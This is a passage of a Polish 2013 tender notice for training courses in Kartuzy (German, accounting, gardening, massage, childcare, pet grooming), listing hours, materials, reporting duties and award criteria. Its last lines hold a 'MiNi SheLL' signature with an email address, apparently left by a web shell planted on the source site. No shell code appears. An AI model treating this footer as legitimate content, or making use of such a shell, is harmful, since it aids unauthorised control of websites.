<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Cel kursu

Celem kursu jest rozszerzenie znajomości języka niemieckiego uczestnika projektu.

b)	Organizacja kursu

Kurs dla 1 osoby, przeprowadzony w terminie 15 czerwca 2013 do 31 sierpnia 2013r. - termin zostanie szczegółowo uzgodniony z Zamawiającym. Miejsce realizacji zajęć:  zapewnia Zamawiający - Kartuzy ul. Gdańska 10c.,  Kurs  powinien trwać minimum 100 h.
Wykonawca jest zobowiązany do wyposażenia kursantów w materiały niezbędne do realizacji kursu.
Uczestnik musi otrzymać niezbędne materiały dydaktyczno-szkoleniowe na własność takie jak: notes, długopis, podręcznik tematyczny i ćwiczenia, słownik języka niemieckiego w wersji papierowej co należy udokumentować protokołem odbioru. 

Wykonawca zobowiązany jest do sporządzania, prowadzenia oraz przekazywania Zamawiającemu w terminie 7 dnia po zakończeniu kursu ostatniego uczestnika.
- oryginału list obecności z wykazem obecności na wszystkich zajęciach teoretycznych i praktycznych,
- imiennego wykazu osób, które ukończyły kurs,
- imiennego wykazu osób, które nie ukończyły kursu,
- zaświadczenie ukończenia kursu,
-potwierdzenie odbioru materiałów dydaktycznych i szkoleniowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Kwalifikacje i doświadczenie osób bezpośrednio realizujących kurs - 40</li>
<li>3. Proponowany program - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs podstaw księgowości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Cel kursu

Celem kursu jest zapoznanie uczestników z podstawami księgowości.
Program kursu powinien zawierać tematy z zakresu:
-organizację i techniki pracy biurowej, prawo pracy, prawo ubezpieczeń społecznych, 
-wynagrodzenia, prawo podatkowe, 
-podstawy księgowości, 
-zagadnienia związane z komputeryzacją prac księgowych (Word, Excel) 
-obsługę programu finansowo-księgowego /Symfonia/ i programu /Płatnik/.
b)	Organizacja kursu

Kurs dla 7 osób, przeprowadzony w terminie 15 czerwca 2013r. do 31 sierpnia 2013r. - termin zostanie szczegółowo uzgodniony z Zamawiającym. Miejsce realizacji:  zapewnia Zamawiający - Kartuzy ul. Gdańska 10c., Kurs  powinien trwać minimum 150 h.
Wykonawca jest zobowiązany do wyposażenia kursantów w materiały niezbędne do realizacji kursu w tym komputery.
Uczestnik musi otrzymać niezbędne materiały dydaktyczno-szkoleniowe na własność takie jak: notes, długopis, minimum 3 różne podręczniki tematyczne, penrdive, kalkulator biurowy,  co należy udokumentować protokołem odbioru. 

Wykonawca zobowiązany jest do sporządzania, prowadzenia oraz przekazywania Zamawiającemu w terminie 7 dnia po zakończeniu kursu ostatniego uczestnika.
- oryginału list obecności z wykazem obecności na wszystkich zajęciach teoretycznych i praktycznych,
- imiennego wykazu osób, które ukończyły kurs,
- imiennego wykazu osób, które nie ukończyły kursu,
- zaświadczenie ukończenia kursu,
-potwierdzenie odbioru materiałów dydaktycznych i szkoleniowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Kwalifikacje i doświadczenie osób bezpośrednio realizujących kurs - 40</li>
<li>3. Proponowany program - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs pielęgnacji ogrodów z elementami projektowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Cel kursu

Celem kursu jest zapoznanie z zasadami projektowania i pielęgnacji ogrodów.
Kurs powinien składać się z części teoretycznej i praktycznej. Program powinien zwierać wprowadzenie do teorii sztuki ogrodowej oraz ogrodnictwa:
-jak powstaje ogród, koncepcja ogrodu,
-podstawy budowy, uprawy i pielęgnacji ogrodów,
-zasady uprawy gleby i ochrony roślin,
-przygotowanie do budowy i uprawy ogrodu.
 Oraz zagadnienia dotyczące roślin
 - rośliny w ogrodzie,
-zabiegi uprawowe i pielęgnacyjne,
- elementy systematyki roślin i roślinoznawstwa,
- grupy roślin, kompozycje roślinne,
- sadzenie roślin,
- zakładanie rabat,
- pielęgnacja roślin po posadzeniu,
- pielęgnacja istniejącego ogrodu.


b)	Organizacja kursu

Kurs dla 2 osób, przeprowadzony w terminie 15 czerwca 2013 do 31 sierpnia 2013r. - termin zostanie szczegółowo uzgodniony z Zamawiającym. Miejsce realizacji zajęcia teoretyczne:  zapewnia Zamawiający - Kartuzy ul. Gdańska 10c., miejsce zajęć praktycznych zapewnia Wykonawca. Dopuszcza się możliwość, aby usługa szkoleniowa była realizowana poza terenem miasta Kartuzy, przy czym dojazd uczestników szkolenia w takim przypadku zapewnia Wykonawca na własny koszt. W takim przypadku, czas dojazdu uczestnika z miasta Kartuzy do miejsca realizacji zadania, za pomocą środków komunikacji, nie może być dłuższy niż 90 minut. Kurs  powinien trwać minimum 50 h w tym 10h teoretycznych i 40h praktycznych..
Wykonawca jest zobowiązany do wyposażenia kursantów w materiały niezbędne do realizacji kursu.
Uczestnik musi otrzymać niezbędne materiały dydaktyczno-szkoleniowe na własność takie jak: notes, długopis, minimum 2 różne podręczniki tematyczne, penrdive, ubranie robocze, obuwie robocze, rękawice ochronne, czapka, podstawowy program projektowania w wersji cd lub dvd co należy udokumentować protokołem odbioru. 

Wykonawca zobowiązany jest do sporządzania, prowadzenia oraz przekazywania Zamawiającemu w terminie 7 dnia po zakończeniu kursu ostatniego uczestnika.
- oryginału list obecności z wykazem obecności na wszystkich zajęciach teoretycznych i praktycznych,
- imiennego wykazu osób, które ukończyły kurs,
- imiennego wykazu osób, które nie ukończyły kursu,
- zaświadczenie ukończenia kursu,
-potwierdzenie odbioru materiałów dydaktycznych i szkoleniowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Kwalifikacje i doświadczenie osób bezpośrednio realizujących kurs - 40</li>
<li>3. Proponowany program - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs masażu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Cel kursu

Celem kursu jest zapoznanie uczestników z zasadami i technikami masażu.
Kurs powinien składać się z części teoretycznej i praktycznej. Program kursu w części teoretycznej powinien obejmować zagadnienia związane z  elementami układu szkieletowego, stawowego, mięśniowego, nerwowego, układu chłonnego oraz wpływem masażu leczniczego na organizm człowieka. 
Zajęcia praktyczne powinny obejmować: masaż manualny ciała tj. głowy, twarzy, kręgosłupa, brzucha, ramienia, przedramienia, całej kończyny górnej, palców kończyny dolnej, śródstopia, podudzia, uda itp.
b)	Organizacja kursu

Kurs dla 3 osób, przeprowadzony w terminie 15 czerwca 2013 do 31 sierpnia 2013r. - termin zostanie szczegółowo uzgodniony z Zamawiającym. Miejsce realizacji zajęcia teoretyczne:  zapewnia Zamawiający - Kartuzy ul. Gdańska 10c., miejsce zajęć praktycznych zapewnia Wykonawca. Dopuszcza się możliwość, aby usługa szkoleniowa była realizowana poza terenem miasta Kartuzy, przy czym dojazd uczestników szkolenia w takim przypadku zapewnia Wykonawca na własny koszt. W takim przypadku, czas dojazdu uczestnika z miasta Kartuzy do miejsca realizacji zadania, za pomocą środków komunikacji, nie może być dłuższy niż 90 minut.  Kurs  powinien trwać minimum 36 h w tym 6h teoretycznych i 30h praktycznych..
Wykonawca jest zobowiązany do wyposażenia kursantów w materiały niezbędne do realizacji kursu.
Uczestnik musi otrzymać niezbędne materiały dydaktyczno-szkoleniowe na własność takie jak: notes, długopis, podręcznik tematyczny, penrdive płytę cd z muzyką relaksacyjną, olejek i balsam do masażu, ręczniki frote min. 70X150 co należy udokumentować protokołem odbioru. 
Wykonawca zobowiązany jest do sporządzania, prowadzenia oraz przekazywania Zamawiającemu w terminie 7 dnia po zakończeniu kursu ostatniego uczestnika.
- oryginału list obecności z wykazem obecności na wszystkich zajęciach teoretycznych i praktycznych,
- imiennego wykazu osób, które ukończyły kurs,
- imiennego wykazu osób, które nie ukończyły kursu,
- zaświadczenie ukończenia kursu,
-potwierdzenie odbioru materiałów dydaktycznych i szkoleniowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Kwalifikacje i doświadczenie osób bezpośrednio realizujących kurs - 40</li>
<li>3. Proponowany program - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs opiekunki dziecięcej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Cel kursu

Celem kursu jest przygotowanie uczestników do pracy opiekunki do dzieci, zarówno w instytucjach jak i domach u prywatnych rodzin.
Kurs powinien składać się z części teoretycznej i praktycznej. Program kursu w części teoretycznej powinien obejmować:
Pierwsza pomoc przedmedyczna.
Podstawy pielęgnacji dzieci (anatomia i fizjologia), profilaktyka zdrowotna, prawidłowa dieta.
Zabawy ogólnorozwojowe w nauce i wychowaniu.
Podstawy psychologii rozwojowej dzieci (aspekty opieki nad dziećmi upośledzonymi, chorymi, nadpobudliwymi i zahamowaniami).
Podstawy psychologii komunikacji z podopiecznym oraz jego rodziną.
Metody wychowawcze - twórcze myślenie.
Praktyki w przedszkolu lub punktach opieki nad dziećmi.

b)	Organizacja kursu

Kurs dla 3 osób, przeprowadzony w terminie 15 czerwca 2013r. do 31 sierpnia 2013r. - termin zostanie szczegółowo uzgodniony z Zamawiającym. Miejsce realizacji zajęcia teoretyczne:  zapewnia Zamawiający - Kartuzy ul. Gdańska 10c., miejsce zajęć praktycznych zapewnia Wykonawca. Dopuszcza się możliwość, aby usługa szkoleniowa była realizowana poza terenem miasta Kartuzy, przy czym dojazd uczestników szkolenia w takim przypadku zapewnia Wykonawca na własny koszt. W takim przypadku, czas dojazdu uczestnika z miasta Kartuzy do miejsca realizacji zadania, za pomocą środków komunikacji, nie może być dłuższy niż 90 minut. Kurs  powinien trwać minimum 80 h w tym 40h teoretycznych i 40h praktycznych..
Wykonawca jest zobowiązany do wyposażenia kursantów w materiały niezbędne do realizacji kursu.
Uczestnik musi otrzymać niezbędne materiały dydaktyczno-szkoleniowe na własność takie jak: notes, długopis, minimum 3 podręczniki tematyczne, penrdive 2 płyty cd z muzyką i bajkami dla dzieci, oraz aktualna książeczka zdrowia co należy udokumentować protokołem odbioru. 
Wykonawca zobowiązany jest do sporządzania, prowadzenia oraz przekazywania Zamawiającemu w terminie 7 dnia po zakończeniu kursu ostatniego uczestnika.
- oryginału list obecności z wykazem obecności na wszystkich zajęciach teoretycznych i praktycznych,
- imiennego wykazu osób, które ukończyły kurs,
- imiennego wykazu osób, które nie ukończyły kursu,
- zaświadczenie ukończenia kursu,
-potwierdzenie odbioru materiałów dydaktycznych i szkoleniowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Kwalifikacje i doświadczenie osób bezpośrednio realizujących kurs - 40</li>
<li>3. Proponowany program - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Kurs gromera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Cel kursu

Celem kursu jest zapoznanie uczestników z zasadami i technikami strzyżenia psów i kotów.
Kurs powinien składać się z części teoretycznej i praktycznej.
Kurs dla dwóch osób. Czas trwania - 90 godzin zajęć praktycznych i teoretycznych. 

Program powinien zawierać m.in. zajęcia praktyczne z pielęgnacji psów i kotów. Kosmetologia, organizacja pracy salonu, pielęgnacja , stylizacja - zagadnienia ogólne, wyposażenie salonu, podstawowa wiedza z zakresu zachowania się zwierząt, organizacja stanowiska pracy, firmy-marketing.

b)	Organizacja kursu

Kurs dla 2 osób, przeprowadzony w terminie 15 czerwca 2013 do 31 sierpnia 2013r. - termin zostanie szczegółowo uzgodniony z Zamawiającym. Miejsce realizacji zajęcia teoretyczne:  zapewnia Zamawiający - Kartuzy ul. Gdańska 10c., miejsce zajęć praktycznych zapewnia Wykonawca. Dopuszcza się możliwość, aby usługa szkoleniowa była realizowana poza terenem miasta Kartuzy, przy czym dojazd uczestników szkolenia w takim przypadku zapewnia Wykonawca na własny koszt. W takim przypadku, czas dojazdu uczestnika z miasta Kartuzy do miejsca realizacji zadania, za pomocą środków komunikacji, nie może być dłuższy niż 90 minut.  Kurs  powinien trwać minimum 90 h w tym 30h teoretycznych i 60h praktycznych. 

Organizator kursu zapewnia : sprzęt niezbędny do przeprowadzenia szkolenia, materiały szkoleniowe w tym jeden dodatkowy do dokumentacji projektu, egzamin wewnętrzny. Ponadto Wykonawca w kosztach szkolenia uwzględni zakup podstawowego zestawu groomerskiego średniej jakości w skład którego wchodzić będzie zakup maszynki do strzyżenia(1 szt), ostrza/głowice tnące do maszynki(1 szt), nożyczki(2 szt), cążki i pilniki do pazurkow(po 1 szt), szczotka(1 szt), grzebień(1 szt), filcak(1 szt), trymer(1 szt), furminatoru/coatminatory(1 szt), fartuch fryzjerski(1 szt). W/w sprzęt winien być nowy, oryginalnie zapakowany i zostanie wydany na własność uczestnika kursu. Zajęcia praktyczne winny odbywać się na żywych zwierzętach w przystosowanych do realizacji w/w kursu.
Wykonawca zobowiązany jest do sporządzania, prowadzenia oraz przekazywania Zamawiającemu w terminie 7 dnia po zakończeniu kursu ostatniego uczestnika.
- oryginału list obecności z wykazem obecności na wszystkich zajęciach teoretycznych i praktycznych,
- imiennego wykazu osób, które ukończyły kurs,
- imiennego wykazu osób, które nie ukończyły kursu,
- zaświadczenie ukończenia kursu,
-potwierdzenie odbioru materiałów dydaktycznych i szkoleniowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Kwalifikacje i doświadczenie osób bezpośrednio realizujących kurs - 40</li>
<li>3. Proponowany program - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com